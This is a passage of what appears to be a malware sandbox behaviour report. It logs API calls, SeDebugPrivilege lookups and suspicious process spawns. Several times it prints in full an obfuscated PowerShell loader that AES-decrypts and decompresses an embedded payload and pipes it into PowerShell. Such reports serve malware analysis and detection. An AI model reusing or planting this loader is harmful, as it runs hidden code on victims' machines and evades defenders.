f7AKjjBzZUsMrvwxWLN43/urxAY51NicDkqfOiiS5UZEksZgYkfzGePaAD3+k/FiLqoZMQTwFw+M0izxrg/nsiZbpa3i/IV6c/+NcOogB/nywwRbweIX3YEXUuHCs82tKesjo/Ot93/bGW1j7HKvyUIbOGiaCrOrB88kOJPxyoAe/u1w3Tki3SWWaJvvoAzF88w+Ybhz5prRR/BNqmFaUNEhJ3KY53Em5Uhk2dyPjCCTH1Oh3TeGg55ArY2lhgXyJNnM9PoAJhRZQ5VIsin5Ie4dXCDSG76mk0usbhheT3EV6vfxmGPEiWUzuS/xlLS87slZmjDUptCv20xfVisMQyVF7pYw/QDgUlLBdx1x1eTlSGapmqmXHaPWBOFeEjHWWv6KjE7EMfuizmJ/sxk2G1fJre1b8/ruq6jS62PR1kf50MpIMDS57WFiBpoCU9bAsjEs+S8o42Yn3FakwypIpmepYNZ8Gx9wbrtDreazE+ENDlAMIn0M1b7IUAu3ceVYF1J1kRKqsHPzuyMxkRryqzFYrJNbYrt5GQ7HBUgURx+N+9NcdaI+nYpsJRGa0RVEXBCC+GkY8l8FdeTWniE6+lae6eMGi3Nx3J8axMNWyUaOJSCQ4M7GC/kLCARNNIcgCxI1hdv+fxLPb9znvLmuUf+nTFh93BQnXAIj3/W5psGXmziMwutMKhkIHWHxFe8Wdh3o+WHnqQ2/J+MSKOrxqIrmSWcT7WR0WUgDoXse8PNAvGAcmYKNSuG9GtCmgbe/qAD9eCy0u8cn+VOYBfM3TOrpB5HHsmF+MDN3qC2FRETDgUQ+h4LQAgzA/HqF/yjd/u7NiZj9HdsOlhFxrlYCucRpsx0PAQ8E1AFPDxdLWaki8BJGLHEaCIO7Q82uthpaz73zTrbIinNzqIaVv/06tuvjf5wMT72e+ebc+Ie3LQks4EVUAqJMucMMb6wCrqf06Q5czWh8SPhK9I8BH0BeeNjH3iHr2pnFvbbk4ZgWPcAfsOFpLH792L8dwJWmbpCcMC3x/qsy/IZf3/tXVSco1fZJ0bunZV1g0jqmyolR1w+n19WET8ruQmose7Nhu9l7asYHY7i5EEOQik1D+1Zz8ayZt6M20Brr8FYQc3PEHO/WDxuduF+WsnAUUNke1c0/Sc5Z5Q0PACvwwxvA738cL3AfIDeB0+E7sOMlk8llo1Sq86TXqtjBskU2gxzvbAcoq4VLUldV1yaZ5RxE7s8PnuxlU/BrRQZjUoQXKVpVvA45zvP3U61F6S9yIxyyJ1dRgd6xA2/dS1IzNVEXN7xULbuhLDf0dsgljZFVHUEuyV73vy74nrUY/4Sqn+39WN/2mqpyTEFn/Kgcgs+JZWOQKJB/IfDOPi3C7iNfR+d4WXAgdnn55N+LoWH+tub+Ad9cHn4fqRoJ6JqFB9x74HViFsT8JDleAzd72SqqutK41lQ2Bl4i0vWwQEMGTf0/QpQHyi3Vx0lqkZ+1GRJDclaKlYkaSn6RRZJpGG3yzyBWO2T4b2Xj2gmhcyL7tlTEEBINASiXC+HwTXV8tNsTyLDXA3wsTC/feEs3C6msAsZfuPdnFT9rd8a+bMj44r0ybHsgREON/jTX8pfinacU7B6ku8gbVZEB9PwUMCqJ+iaj0ByMOlo7wlZkC9bKrlaWE2zrRwiE5zOOZnwCXHChEhwzueik13nwZlEHrwjhQQiaq36qGblU5aPgspHD0zjiaX7jcHt54iPiF2jT8D1g5WB5JQjU/9wSBrDvD4uzuEPMeQb5zDbq266ptjitL2YHDqCpdmvhaeTQZMJe2YG3/j';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - }
filepath: powershell.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell -
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
parent_process powershell.exe martian_process C:\Windows\System32\cmd.exe /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell -
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = '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